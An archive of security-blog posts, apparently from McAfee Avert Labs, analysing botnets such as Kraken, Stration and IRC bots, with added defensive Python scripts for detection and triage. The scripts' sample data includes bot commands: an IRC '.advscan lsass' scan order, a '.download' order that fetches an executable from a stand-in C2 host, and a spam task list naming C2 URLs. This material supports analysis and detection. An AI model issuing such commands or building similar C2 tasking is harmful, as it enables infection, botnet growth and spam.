Archive for the 'Bot and BotNet Research' Category

Mailbot.f (a.k.a “Kraken”) gets stealthier - Update

Over the past week, Mailbot.f (a.k.a. “Kraken”) has been thoroughly studied and reverse engineered by various security researchers. As mentioned in my previous post, we focused mainly on the network behavior of the bot and observed a few interesting things.

After the bot installs on a victim machine, it attempts to contact mx.google.com on TCP destination port 25 (SMTP) three times. This looks to be a connectivity test: if it fails, the bot does not send out any spam at a later stage. (Note that the bot does not use mx.google.com to spam.) Next, the bot downloads the front page of three different popular web sites (mostly news sites) drawn from a list that includes nytimes.com, cbsnews.com, news.com, cnn.com, reuters.com, msn.com and google.com. We have not observed any of these web pages being reused in the spam sent out by this bot, however.

[Figure: Kraken SMTP connectivity test and news-site downloads]

The bot then tries to find its peers and communicates with them. If it is an older version of the bot, it uses UDP destination port 447 to talk to its peers, sending information such as the bot version, outgoing SMTP connectivity status and machine-specific details such as hostname, operating system, uptime, language, CPU specs and memory. It also reports its current modules and their versions. The older version of the bot then downloads an update from its peers by connecting on TCP destination port 447; we have observed this update to be around 100 to 200 kbytes. The bot then updates itself.

[Figure: Kraken old-version to new-version update over TCP port 447]

The new version of the bot (or the bot updated in the previous step) contacts its peers over UDP on random destination ports and sends similar information. It then connects to one of the peers on TCP destination port 80 to update its modules; if the peer answers on port 80, the bot exchanges HTTP POST messages with it and receives the updates that way.

[Figure: Kraken module update over HTTP POST on TCP port 80]

When the peer is not available on TCP port 80, the bot falls back to TCP destination port 443 to download the module updates. Although it uses port 443, the data is not SSL.

[Figure: Kraken module update over TCP port 443 (non-SSL)]

The bot then downloads other modules from its peers, such as the spam template, the spam payload and MX server addresses. With this information it starts sending out spam e-mail. After sending out a batch of spam, it downloads further updates and sends out spam again.

We made the above observations after looking at a number of Mailbot.f samples. Most of these samples were either v315 or v316 (as derived from the bot's client registration packet). All of the command and control (C&C) communication is encrypted; we were able to decode some of it using the Wireshark plugin referenced by the mnin security blog. Since the bot can be updated at will by its author, any of these observations may change at any time.

Given that the bot uses

  • encrypted data
  • random UDP destination ports with random size packet payloads
  • legitimate HTTP protocol on TCP destination port 80
  • communication on TCP destination port 443

its c&c communication is very stealthy and difficult to detect with port- or signature-based rules alone. Although the bot is currently used to send spam e-mail, the stealthy c&c channel and the update infrastructure already in place could pose a far greater threat if put to more destructive use.
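One practical check that follows from the observations above is to look at what is actually sent on port 443. A real TLS session opens with a ClientHello record; Kraken's update traffic on 443 does not. The script below is an added example (not code from the original post) that labels the first client bytes of a port-443 stream as TLS, plaintext HTTP or opaque; the sample payloads and addresses are constructed for illustration.

```python
"""Check whether traffic on TCP/443 is actually TLS.

Added example, not code from the original post: Kraken's updated c&c talks
on port 443 without SSL, so the cheapest check is to look at the first
bytes the client sends and see whether they form a TLS ClientHello.
Sample payloads below are constructed for illustration."""

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"CONNECT ")


def looks_like_tls_client_hello(data: bytes) -> bool:
    """True for a TLS record of type handshake (0x16), version 3.x, whose
    first handshake message is a ClientHello (0x01), or for an SSLv2-style
    compatibility ClientHello (2-byte length with the high bit set, then 0x01)."""
    if len(data) < 6:
        return False
    if data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x03:
        record_len = int.from_bytes(data[3:5], "big")
        return 0 < record_len <= 0x4000 and data[5] == 0x01
    if data[0] & 0x80 and data[2] == 0x01 and data[3] == 0x03:
        return True
    return False


def classify_443_payload(data: bytes) -> str:
    """Label the first client bytes of a port-443 stream."""
    if looks_like_tls_client_hello(data):
        return "tls"
    if data.startswith(HTTP_METHODS):
        return "http-plaintext"   # HTTP POST on 443, as the updated bot does
    return "opaque"               # neither TLS nor HTTP: encrypted custom protocol


def flag_non_tls_443(flows):
    """flows: iterable of (src, dst, dport, first_client_bytes).
    Returns (src, dst, label) for every port-443 flow that is not TLS."""
    suspicious = []
    for src, dst, dport, payload in flows:
        if dport != 443:
            continue
        label = classify_443_payload(payload)
        if label != "tls":
            suspicious.append((src, dst, label))
    return suspicious


# Constructed samples (not captured data).
TLS_HELLO = b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32
SSLV2_HELLO = b"\x80\x2e\x01\x03\x01\x00\x15\x00\x00\x00\x10"
HTTP_ON_443 = b"POST /update HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 312\r\n\r\n"
OPAQUE = b"\x8f\x3a\xc2\x10\x5e\x77\x01\xd4\x9b\x22\xee\x40"

SAMPLE_FLOWS = [
    ("10.0.0.5", "203.0.113.7", 443, TLS_HELLO),     # real TLS: ignored
    ("10.0.0.5", "198.51.100.9", 80, HTTP_ON_443),   # port 80: not examined here
    ("10.0.0.5", "198.51.100.9", 443, HTTP_ON_443),  # HTTP POST on 443
    ("10.0.0.5", "192.0.2.33", 443, OPAQUE),         # encrypted custom protocol
]

if __name__ == "__main__":
    for src, dst, label in flag_non_tls_443(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:443 {label}")
```

The same first-bytes test works on port 80: an HTTP POST is expected there, so the interesting flows are the ones whose body is high-entropy and whose Host header does not resolve to anything a user would visit, which this script does not attempt to judge.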

Mailbot.f (a.k.a “Kraken”) gets stealthier

After the recent interest in the Kraken bot from various communities, Gaurav Dalal, Denys Ma and I have been observing the network behavior of the bot very closely. About two weeks after the initial analysis from SANS, it seems the bot author seeded the bot with an update via TCP port 447. The updated bot now uses a stealthier command and control (c&c) mechanism that evades the previously proposed detections. It no longer uses UDP port 447 with 74 bytes of payload; after updating itself, it uses UDP packets on random ports with random payload lengths for its c&c communication. All of this c&c communication is encrypted. To our surprise, we also noticed that the updated bot now uses the well-known HTTP protocol on TCP ports 80 and 443 to send and receive encrypted c&c data. More interestingly, the communication on port 443 is encrypted but not SSL. Both the upgrade process and the c&c mechanism itself are very interesting. We are continuing our research and will update this blog with more technical information soon.

Counting the bots

As I was recently asked about botnet figures, I revisited our collections to establish some trends in this area.

In 2004 and 2005, bots were placed in a group of their own, separate from viruses and Trojans. Their names often ended in « bot » (W32/Sdbot, W32/Spybot, W32/Gaobot…). Based on the number of separate variants we had in our collections (the zoos) at the time, statistics showed a constant increase.

We have noted since then that a lot of malware has a remote-control feature (i.e. it is a bot). Whether we are dealing with worms, viruses or Trojans, they are designed to receive commands and execute them at some point in their life. As of today, much of this remotely controlled malware is known under various malware family names (W32/Nuwar, W32/Mytob, Spam-Samburg, Srizbi, Backdoor-DIX, etc.). Consequently our counting methods have to change.


On the Internet, various websites let us measure different aspects of the threat.

For example, the Shadowserver web site publishes a botnet count: a graph of all the active Command and Control (C&C) servers the Shadowserver Foundation is aware of. There are approximately 2900 botnets today compared to 1400 one year ago.

Counting the infected computers is a much more arduous task. In January 2007, I reported on Vinton Cerf's talk at the World Economic Forum in Davos, Switzerland, where he estimated that 100 to 150 million machines were infected, over 10% of the PCs connected to the Internet. At the same time, some sources estimated fewer than 10 million machines, while others said they identify nearly 250,000 new bots, or infected IPs, each day.

Various techniques can be used to track zombie machines. I will mention only a few, which gives me the opportunity to share some interesting links:

  1. Observing DNSBL queries
    The method is described in a white paper from the College of Computing, Georgia Institute of Technology. It is based on the insight that botmasters themselves perform DNS-based blackhole list (DNSBL) lookups to determine whether their spamming bots are blacklisted. There are techniques and heuristic rules to distinguish botnet DNSBL reconnaissance queries from the legitimate DNSBL traffic of real mail servers.
  2. Watching IRC traffic
    This is one of the simplest methods of detecting IRC-based botnets. It involves sniffing IRC traffic and searching for signatures matching known botnet commands.
  3. Checking behavioural characteristics
    As an example, researcher Stéphane Racine showed that IRC bots sit idle most of the time in a chat channel but respond faster than a human once they receive a command.
  4. Searching for malware hashes on P2P networks
    With decentralized peer-to-peer botnets, compromised nodes can be identified by their retrieval of hashes known to be associated with the botnet. The College of Computing and Informatics at the University of North Carolina at Charlotte proposed this method for tracking W32/Nuwar (alias Storm) infected machines. To determine which search hashes are pertinent, the bot can either be run on an isolated network without a true Internet connection to observe the hashes it currently searches for, or the hash generation algorithm can be extracted from its binary to generate hash sets on the fly from the limited set of random integers and the current time.
  5. Watching attack traffic
    Analysing the traffic linked to massive spam distribution or DDoS attacks can reveal the number of compromised computers. Since January 2008, the Shadowserver graphs show a huge increase in this area.

To conclude, I have to say that looking at these studies did not help me calculate how many computers are affected by bots at the moment. Extrapolating from the 120,000 or 150,000 machines known to be active in a botnet at a given moment to a total number is hard to envisage. However, these searches were not useless: we can certainly predict that an increase in DDoS attacks will be a 2008 issue and, for sure, more and more botnets will be used in this way; perhaps 40 or 50% of them.

SPAM : Death by a thousand cuts!!

In the “good old days” spammers aggressively scanned the Internet for open relay servers to send spam through. Open relays are out of fashion these days, so much so that the Open Relay DataBase is shutting down because of the change in spammer tactics.

Today's spammers, in collusion with malware authors, infect thousands of machines on the Internet and turn them into spam relay zombies. These zombies connect to a web server controlled by the spammer, which provides a constantly updated live feed of e-mail addresses and content to spam. The content can be anything from pump-and-dump stock tips to online pharmaceuticals or the usual penis enlargement. Each zombie can send hundreds of spam e-mails per minute depending on the bandwidth available. Examples: Spam-Maxy, Spam-Loot.

With more and more machines on broadband and ADSL connections, this unholy alliance of malware authors and spammers has a fertile breeding ground to take advantage of.

At McAfee Avert Labs Bangalore, we sampled emails that were captured by our honeypot this quarter. The following chart shows the content of the email messages captured during in-house live testing of malware:

[Figure: Captured e-mail content]

Only 11% were executable attachments. 2% were mails containing infection notifications or captured cached passwords meant for the trojan author. The rest, some 87%, was spam. A high percentage of this spam was image spam and ASCII art, techniques that spammers have used effectively to subvert traditional anti-spam detection.

Although we have seen malware-controlled spam networks in the past, most notably the W32/Bagle and W32/Sober families, the complexity and sophistication of today's W32/Stration and Spam-DComServ trojans demonstrate the alarming advances made by these digital miscreants. McAfee Avert Labs continues to keep a close watch on these developments in the spam world.

IMs, VoIP and Spam

Technologies advance with time, and instant messengers are no exception. Not long ago people were happy sending text messages; then VoIP came along and changed the scene, and IM vendors soon embraced it. Many IM clients are now VoIP enabled. As soon as VoIP started going mainstream, security researchers warned of related issues. One was abuse by spam, usually referred to as SPIT (spam over Internet telephony). Wikipedia describes SPIT as an “as-yet-nonexistent problem”. As VoIP gets more popular the scenario is changing fast, and this “as-yet-nonexistent problem” is slowly but surely emerging. The following image shows real-world VoIP spam over Skype.

[Figure: Real-case Skype SPIT]

The image shows a typical SPIT call. The spammer starts a conference call with some random users and plays the spam message. This process is most likely automated with bots rather than done by hand.

Use and abuse are two sides of the same coin, and this technology is no exception. All major IM providers give away SDKs for developing add-ons; the same SDKs lower the bar for spammers to develop bots. We have witnessed this with the ongoing development of Skype malware.

The image below shows the assembly code for the loop the Skype malware uses to search for users. Note the “SEARCH USERS” Skype API command:

[Figure: Assembly loop showing the Skype SEARCH USERS API in use by Skype malware]

The malware actually uses more of these APIs; the image below highlights them:

[Figure: More Skype APIs in use by Skype malware]

These APIs are part of the Skype SDK and are documented by Skype. It is just a matter of time before we see bots in the wild built on top of the IM SDKs provided by vendors. We advise users to be aware of this developing attack vector. McAfee Avert Labs is prepared for this battle!!
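Because the Skype API is driven by plain text commands, a sample that uses it carries those command strings somewhere in its image, either as ASCII or as UTF-16LE (the usual encoding for Win32 wide strings). The triage helper below is an added example, not code from the original post: it reports the offset and encoding of each Skype API command string it finds. "SEARCH USERS" is the command named above; PROTOCOL, SEARCH FRIENDS and GET CALL are other public Skype API commands as I remember them and should be checked against the SDK documentation. The sample blob is constructed.

```python
"""Triage a sample for Skype desktop-API command strings, in ASCII and UTF-16LE.

Added example, not code from the original post. "SEARCH USERS" is the command
the post names; PROTOCOL, SEARCH FRIENDS and GET CALL are other commands from the
public Skype API as I remember it (assumption: verify against the SDK docs).
The sample blob below is constructed."""

SKYPE_API_COMMANDS = ["PROTOCOL", "SEARCH USERS", "SEARCH FRIENDS", "GET CALL"]


def encodings_for(command: str):
    """Both encodings a Windows binary commonly stores such strings in."""
    return (("ascii", command.encode("ascii")),
            ("utf-16le", command.encode("utf-16-le")))


def find_api_strings(blob: bytes):
    """Return sorted (offset, encoding, command) for every occurrence."""
    hits = []
    for command in SKYPE_API_COMMANDS:
        for enc_name, needle in encodings_for(command):
            start = 0
            while (pos := blob.find(needle, start)) != -1:
                hits.append((pos, enc_name, command))
                start = pos + 1
    return sorted(hits)


def distinct_commands(hits):
    """The set of API commands present, which is what a quick verdict needs."""
    return sorted({command for _, _, command in hits})


# Constructed blob standing in for a PE image: some padding, an ASCII
# "PROTOCOL 7" handshake, an ASCII SEARCH USERS format string and a
# UTF-16LE "GET CALL ... STATUS" query.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"PROTOCOL 7\x00"
    + b"\xcc" * 16
    + b"SEARCH USERS %s\x00"
    + b"\x90" * 8
    + "GET CALL %d STATUS".encode("utf-16-le") + b"\x00\x00"
)

if __name__ == "__main__":
    hits = find_api_strings(SAMPLE_BLOB)
    for off, enc, cmd in hits:
        print(f"0x{off:06x} {enc:8s} {cmd}")
    print("API commands present:", distinct_commands(hits))
```

Packed or encrypted samples will show nothing until unpacked; run this against a memory dump of the running process in that case.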

Bot pangs - The pain of patching

Malware authors have been proactive in incorporating exploit code for almost every newly reported vulnerability into bots, with the utmost professionalism. Apart from the numerous Microsoft Windows vulnerabilities whose exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular third-party applications are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

Although the vulnerabilities in the above software are old and patches are available, bot authors still found them enticing enough to target machines running vulnerable versions.

Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

Most major software vendors such as Adobe, Microsoft and Oracle now follow a regular patch cycle (monthly in Microsoft's case, quarterly for Oracle's Critical Patch Updates), and administrators have their hands full ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches to every machine immediately, for policy reasons. For example, the organization could be using legacy software that would break if a new service pack were applied, and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix can break something else in the operating system or adversely affect other applications. Administrators need time to deploy these hot fixes in a test environment and QA them properly before rolling them out to the entire enterprise.

Given the trend of malware authors expanding their attack horizon to vulnerable third-party applications, it wouldn't be surprising if an exploit directed at a popular instant messaging (IM) client surfaced. IM is popular in both consumer and corporate networks, and an exploit that gives a remote shell on a machine running an instant messenger would be stunningly effective.

That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

McAfee Avert Labs 2007 Threat Predictions PodCast

Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

Download the podcast

Watch a live spam bot in action.

Ever wondered how a trojan infected computer gets its orders to spam? Take a peek with me into one trojan’s junkmail activities. The following account is happening as I type, and shows that some image spam is not unique even though it appears to be random.

The SMTP-sending trojan first phones home for its task list, via HTTP on the SMTP port (25). Port 25 on the host machine is running Apache/1.3.37, a very unusual place to find Apache.

The task list looks like this:

$GET "http://example.com:25/outtask/urlTask8_c_2.txt?id=MAGID-ID-STRING&flag=1"
10
12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|
http://get.example.com:8091/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

(line breaks and spaces added for readability)

The response it got is in the following format:
“tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|”

So in the example above, the bot got 3 tasks. We’ll take a look at the first one in more detail….
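To show what the bot actually does with that response, the script below parses the task list into records using the field layout given above and pulls out the endpoints a network team would want to block. It is an added example, not code from the original post. Two points are my assumptions rather than the post's: that the raw response carries one task per line (the post only says its line breaks were added for readability), and that the ten-digit number in each letter file name is a Unix timestamp. The first line ("10") is kept as an opaque header because the post does not explain it.

```python
"""Parse the pipe-delimited task list the spam trojan fetches over HTTP on port 25.

Added example, not part of the original post. Field meanings follow the
format line given in the post:
  tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|
The first line of the response ("10" in the capture) is kept as an opaque
header; its meaning is not stated in the post. One task per line, and the
letter file number being a Unix timestamp, are my assumptions."""
from dataclasses import dataclass
from datetime import datetime, timezone
from urllib.parse import urlsplit
import re


@dataclass
class SpamTask:
    number: int
    letter_url: str        # spam text/template
    addresses_url: str     # address-list feed (cgi2.cgi)
    report_url: str        # where delivery results go
    flag: str              # the constant "1" field
    report_url2: str       # second report address (cgi-bin/put)


def parse_task_list(text: str):
    """Return (header, [SpamTask]) from the raw response body."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    header, tasks = lines[0], []
    for line in lines[1:]:
        fields = line.split("|")
        if len(fields) < 7:
            raise ValueError(f"malformed task line: {line!r}")
        tasks.append(SpamTask(int(fields[0]), fields[1], fields[2],
                              fields[3], fields[4], fields[6]))
    return header, tasks


def letter_timestamp(task: SpamTask):
    """Decode the 10-digit number in task_<n>_letter_<digits>.txt as UTC
    time (assumption: the server names letter files by Unix time)."""
    m = re.search(r"_letter_(\d{10})\.txt$", task.letter_url)
    return datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc) if m else None


def infrastructure(tasks):
    """Distinct host[:port] endpoints the tasks point the bot at, for blocking."""
    hosts = set()
    for t in tasks:
        for url in (t.letter_url, t.addresses_url, t.report_url, t.report_url2):
            hosts.add(urlsplit(url).netloc)
    return sorted(hosts)


# Raw response reconstructed from the capture in the post (readability line
# breaks removed, one task per line); example.com hosts as in the post.
RAW_TASK_LIST = (
    "10\n"
    "12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|"
    "http://get.example.com:8092/cgi-bin/cgi2.cgi|http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
    "20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|"
    "http://get.example.com:8091/cgi-bin/cgi2.cgi|http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
    "22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|"
    "http://get.example.com:8092/cgi-bin/cgi2.cgi|http://serv2.example.com/report2.cgi|1||"
    "http://mail.example.com:8888/cgi-bin/put|\n"
)

if __name__ == "__main__":
    header, tasks = parse_task_list(RAW_TASK_LIST)
    print("header:", header)
    for t in tasks:
        print(t.number, letter_timestamp(t), t.addresses_url)
    print("endpoints:", infrastructure(tasks))
```

Note that the address-list feed alternates between ports 8091 and 8092 on the same host, so a block on one port alone would leave the bot working.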

Not all bot-money is made in “cyberspace”

There's something I've been hearing mentioned a lot lately, particularly from those in law enforcement circles: the importance of “mules” in bot-related money-making schemes. These are work-at-home jobs offered through very professional-looking websites, through classified ads and even through IM. They are a crucial part of the reason so many bots can be run from places around the globe. To obtain merchandise (often for resale) or cash with stolen credit card credentials, the thieves face stricter controls if the goods are going to another country. To get around these controls, they use mules inside the originating countries.

These mules are often someone who’s desperate for money or someone who figures it’ll be the (unfortunately fictitious) company who’d get in trouble rather than themselves, so they tend to ask few questions of their “employers”. Laws in most countries are better able to handle this sort of trafficking of stolen goods, so it tends to be these small-time players who are most often prosecuted within the web of illegal botnet activities.

Bots and botting…. A Lost Cause?

There's been discussion lately about whether we've already lost the war against malicious bots. Certainly things look fairly grim, as the number of IRC bot variants has grown by leaps and bounds over the last couple of years. Relying strictly on string-based detection against the unending tide certainly appears to be a lost cause.

On the other hand, there are some more promising developments in recent years:

  • Most AV vendors at this point have gone to using some sort of generic detection or behavior-based heuristics against the most popular bot-families, which can proactively detect a certain amount of new bots
  • Firewalls and IDS/IPS products are becoming more widely used, even by home users
  • Many corporations are blocking IRC traffic
  • ISPs are increasingly involved with security groups that have developed to shut down Command & Control channels used by bots

From my perspective, I see a few things being particularly important in solving the bot problem:

  • Further cooperation of security companies and ISPs in order to get more C&Cs shut down
  • Further cooperation of security companies, ISPs and Law Enforcement agencies in order to ensure more bot masters face legal action
  • ISPs offering more security services than simply AV software (i.e. traffic filtering)
  • More security information being available to novice users (i.e. http://pbskids.org/license/)
  • More accountability for adware vendors who fund these malicious affiliates
  • A paradigm shift, particularly for home users, to a security strategy of allowing known-good traffic rather than blocking known-bad traffic

What are your thoughts on the general state of things?

Have the Bot Wars been lost? What more could be done to ensure that Bot Masters don’t make the internet completely unusable?

W32/Stration - The new “old” kid in town

Today's mass mailers are often seeded from thousands of zombie drones connected to botnets. Time on a botnet can be bought, for the right price, to launch the next mass-mailer variant. When these zombies are instructed to download and execute a worm, a mini outbreak is created as thousands of machines across the Internet simultaneously start mailing copies of it. These artificial outbreaks die by themselves once antivirus vendors release updated detection for the worm.

By using enticing subjects and message bodies and spoofing the ‘from’ address to appear to come from trusted sources, mass mailers have traditionally depended on social engineering to get a victim to execute a malware attachment. Given that mass mailers seem out of vogue these days, with malware authors focusing on more effective infection vectors like operating system or browser vulnerabilities, it's nostalgic to see a new “old” kid in town.

W32/Stration is a mass mailer that has been around since August this year and is one of the few active and evolving mass mailers in recent times. Very typical of the mass mailing variety, W32/Stration harvests email addresses from an infected machine and mails a copy of itself using some convincing message bodies.

A sample spoofed email message is as follows:

“Our firewall determined the e-mails containing worm copies are being sent from your computer. Nowadays it happens from many computers, because this is a new virus type (Network Worms). Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses. Please install updates for worm elimination and your computer restoring.”

Leaving out the poor grammar, such a dire message appearing to come from the administrator of your company could be stunningly effective in getting uninformed users to take the bait.

W32/Stration uses a self-updating mechanism to keep itself going. Infected machines connect to a hard-coded URL in the body of the worm to download a possibly newer version of the worm and execute it. This keeps the worm undetected for an extended period and gives it a longer shelf life in the wild.

The author seems to be investing considerable time and effort into unleashing newer variants of W32/Stration on to the internet. But it’s surprising that no lucrative payloads like adware or password stealing trojans have been seeded onto infected machines. One can only wonder about the objective behind developing and releasing newer variants of this worm. Is the current wave being used to build a massive pool of infected computers for a larger scale of attack on the internet? Sadly, the motive behind unleashing this worm is still unknown at the time of writing this blog. McAfee Avert Labs continues to keep a close eye on future developments of W32/Stration.

Its all in the Game!!

The online gaming industry has matured into a serious business with revenues running into the billions of dollars. As we know, once something gains popularity on the Internet and is profitable, it becomes an attractive target for hackers.

In the early days, game crackers spent quality time breaking CD protection or finding secret codes to unlock hidden weapons and levels. With the advent of online games and massively multiplayer online role-playing games (MMORPGs), official gaming networks now require legitimate CD keys and/or registered accounts to log on and play online. Virus authors responded by unleashing a rash of trojan horse programs masquerading as game cheats or trainers in order to steal CD keys for online games. To get victims to run these trojans, the files were posted on bulletin board systems, Internet relay chat channels or popular gaming forums. But the intended victim still had to download and execute the trojan for the ploy to work.

So the obvious question was “How do we make a self-spreading game CD key stealer?” Sdbot and Gaobot, which spread via exploits and weak passwords, were readily available at the time. It wasn't long before a module was written and added to the bot code to steal CD keys for popular online games from Electronic Arts, id Software, Red Storm and Valve. Fortunately most of the bots in the wild these days have dropped this functionality, as the popularity of some of those online games has waned.

Massively multiplayer online role-playing games like Lineage, World of Warcraft and the Final Fantasy series rule the gaming world today, with an insane number of hardcore gamers competing against each other in the virtual world. Every day, McAfee Avert Labs receives numerous malware samples designed to steal game account information for popular titles. And in a shift away from trojan horse programs masquerading as game cheats, we are seeing a trend where virus authors write old-school file infectors like W32/Bacalid, W32/Detnat and W32/Philis that target popular role-playing games.

Are these guys doing it for the love of the game? Nope.. sounds too good to be true. Underground RMT (Real-Money trading) groups thrive in dealing with stolen game accounts and operate mostly out of Asia. And with a player’s stolen account information, their virtual assets can be transferred to another players account or simply auctioned off and sold for real money. This phenomenon is currently region specific but could easily reach menacing proportions similar to the threats plaguing online internet banking.

Autopilot IRCBots - smart and funny

The vast majority of IRC-based bots seen these days can be said to be on “autopilot” in a sense. After joining a predefined IRC channel, the bots read the channel topic and accept it as a command. The authors of such bots just need to set up these channels with the correct commands and then leave it to the bots to spread and, possibly, earn money for their authors.

In general, such bots perform the following steps

  1. Query for the domain where the IRC server resides
  2. Try to connect to an IRC server at some predefined set of ports
  3. Once connected to the IRC server, join a predefined channel by issuing “JOIN <channel>”
  4. Read the topic for the channel and accept it as a command

Generally, the topic of the first channel instructs the bot to join other channels, the topics of which may in turn cause the bot to execute various commands or further join more channels. The major functions that such bots generally perform for their author are i) Spread: increase the size of a botnet by scanning the network and infecting other vulnerable machines. ii) Earn money: by downloading adware, stealing personal information etc.

Different bots may connect to different domains, ports and channel names and may download different adware, but the overall mechanism remains the same: once the channel topics have been set, they all go about on their own, adding more machines to the botnet and earning money automatically. While his bots are on autopilot, the author can relax or spend his time on things like researching new vulnerabilities to exploit, rather than sitting in a channel issuing the same commands to each new machine that joins.
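The topic-as-command mechanism just described, together with the behavioural check from “Counting the bots” (bots sit idle, then answer a command faster than any human), can be worked over a captured IRC session. The script below is an added example, not code from the original posts: it parses the raw IRC lines, lists the topic and operator commands the bot would act on, and measures how quickly the client answered each. The capture is constructed; the server name, nick format and the dot-prefixed command syntax are modelled on Sdbot-style bots and are assumptions.

```python
"""Two checks over a captured IRC session, as added example code (not from the
original posts): recover the channel-topic commands an "autopilot" bot will
execute, and measure how quickly the client answers each command, the
behavioural tell described under "Counting the bots".

The capture below is constructed. Server name, nick format and the dot-prefixed
command syntax are modelled on Sdbot-style bots and are assumptions."""
from statistics import median

COMMAND_PREFIXES = (".", "!")

# (seconds since start, direction, raw IRC line); "S" = server->client, "C" = client->server
CAPTURE = [
    (0.00, "C", "NICK [USA|XP|482913]"),
    (0.01, "C", "USER jq 0 0 :jq"),
    (0.42, "S", ":irc.example.net 001 [USA|XP|482913] :Welcome"),
    (0.43, "C", "JOIN #main"),
    (0.80, "S", ":irc.example.net 332 [USA|XP|482913] #main :.join #scan"),
    (0.83, "C", "JOIN #scan"),
    (1.20, "S", ":irc.example.net 332 [USA|XP|482913] #scan :.advscan lsass 100 5 0 -r -s"),
    (1.24, "C", "PRIVMSG #scan :[SCAN]: Random port scan started on 445 with 100 threads."),
    (5400.00, "S", ":op!op@c2.example.net PRIVMSG #scan :.download http://c2.example.net/a.exe c:\\a.exe 1"),
    (5400.05, "C", "PRIVMSG #scan :[DOWNLOAD]: Downloading URL to c:\\a.exe."),
]


def parse_irc_line(line):
    """Split an RFC 1459 line into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return prefix, parts[0], parts[1:], (trailing if sep else None)


def commands_received(capture):
    """Commands the bot will act on: channel topics (332/TOPIC) and operator
    PRIVMSGs whose text starts with a command prefix."""
    found = []
    for t, direction, raw in capture:
        if direction != "S":
            continue
        _, cmd, params, trailing = parse_irc_line(raw)
        if trailing is None or not trailing.startswith(COMMAND_PREFIXES):
            continue
        if cmd == "332":
            found.append((t, params[1], "topic", trailing))
        elif cmd in ("TOPIC", "PRIVMSG"):
            found.append((t, params[0], cmd.lower(), trailing))
    return found


def response_latencies(capture):
    """Seconds from each command to the client's next line."""
    client_times = [t for t, d, _ in capture if d == "C"]
    lat = []
    for t, _, _, _ in commands_received(capture):
        nxt = [c for c in client_times if c > t]
        if nxt:
            lat.append(nxt[0] - t)
    return lat


def classify_client(capture, max_latency=0.25, min_idle=600.0):
    """Bot-like: answers commands within max_latency but otherwise sits idle
    for at least min_idle seconds at a stretch."""
    client_times = [t for t, d, _ in capture if d == "C"]
    idle = max((b - a for a, b in zip(client_times, client_times[1:])), default=0.0)
    lat = response_latencies(capture)
    med = median(lat) if lat else None
    bot_like = med is not None and med < max_latency and idle >= min_idle
    return {"median_latency": med, "max_idle": idle,
            "verdict": "bot-like" if bot_like else "unclear"}


if __name__ == "__main__":
    for t, chan, src, text in commands_received(CAPTURE):
        print(f"{t:9.2f} {chan} ({src}): {text}")
    print(classify_client(CAPTURE))
```

The latency threshold is deliberately loose; the stronger signal is the combination of near-instant replies with hours of silence in between, which a human chatting in the channel does not produce.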

Some such bots have a funny side too: they display funny messages along with the IRC banner returned by the server. One example is W32/Sdbot.worm.gen.h, which connects to forum.ednet.es on port 4915. The channel is still active at the time of writing. A screenshot of the message returned from the server is linked here.

McAfee Avert Labs has been observing such behavior lately, and it has also been discussed elsewhere recently. Even though the banner claims to be one, this is not a “legit botnet”: the channel will happily instruct a bot to scan the network for vulnerable hosts and infect them. It is as insidious as any other botnet.

One can only see this message by connecting to the server with an IRC client or by looking at the bot's communication in an Ethereal dump. A normal user whose machine is infected will never see it. So whom is this message intended for?

Possibly it is just intended for the “readers” who analyze such threats. Like, every once in a while we see a malicious executable which has a few strings just for fun or to challenge the person who is analyzing the memory dumps. Similarly I think this is just the fun part which the malware authors and AV researchers share.

Or, if you like, it can be called a social engineering technique that malware writers use to fool “readers” into believing that this channel, even if part of a botnet, is actually legal. It is unlikely, however, to stop researchers from adding detection for such bots, nor will it prevent the IRC channel from being taken down once discovered.

Such “special” responses could also potentially be used to obfuscate/encode information being conveyed to the bot.

Google Analytics and Bots

